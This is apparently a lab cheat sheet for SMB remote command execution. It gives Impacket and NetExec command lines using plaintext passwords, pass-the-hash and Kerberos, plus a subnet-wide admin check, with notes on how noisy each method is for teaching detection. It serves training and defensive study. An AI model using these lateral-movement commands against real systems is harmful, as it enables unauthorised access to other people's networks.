SMB remote execution requires administrative access on the target. The tools differ mostly by how they create the process and what artifacts they leave: service creation, WMI/DCOM activity, scheduled tasks, file drops, or SMB output channels.
psexec.py
psexec.py ootw.local/Administrator:'Password123!'@10.10.10.201
psexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
psexec.py -k -no-pass ootw.local/Administrator@ws01.ootw.local -dc-ip 10.10.10.200
wmiexec.py
wmiexec.py ootw.local/Administrator:'Password123!'@10.10.10.201
wmiexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
wmiexec.py -k -no-pass ootw.local/Administrator@ws01.ootw.local -dc-ip 10.10.10.200
smbexec.py
smbexec.py ootw.local/Administrator:'Password123!'@10.10.10.201
smbexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
atexec.py
atexec.py ootw.local/Administrator:'Password123!'@10.10.10.201 "whoami /all"
atexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH "ipconfig /all"
NetExec
nxc smb 10.10.10.201 -d ootw.local -u Administrator -p 'Password123!' -x "whoami /all"
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH -x "whoami /all"
nxc smb 10.10.10.201 -d ootw.local -u Administrator -p 'Password123!' --exec-method wmiexec -x "hostname"
Admin check
nxc smb 10.10.10.0/24 -d ootw.local -u Administrator -p 'Password123!'
nxc smb 10.10.10.0/24 -d ootw.local -u Administrator -H NTLM_HASH
Notes
psexec.pyis reliable but loud.wmiexec.pyoften has fewer service-drop artifacts but needs WMI/DCOM.atexec.pyis useful for one-shot commands.- Pick the method based on the lab goal and telemetry being taught.